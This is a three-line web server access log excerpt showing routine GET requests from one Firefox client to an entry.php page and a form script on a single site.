178.165.186.69 - - [03/Feb/2025:10:49:33 +0100] "GET /entry.php?id=10271&&ser=576112 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=576052" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:49:33 +0100] "GET /gui/javascript/form_form.js?1738576173 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=576112" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:50:33 +0100] "GET /entry.php?id=10271&&ser=576173 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=576112" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
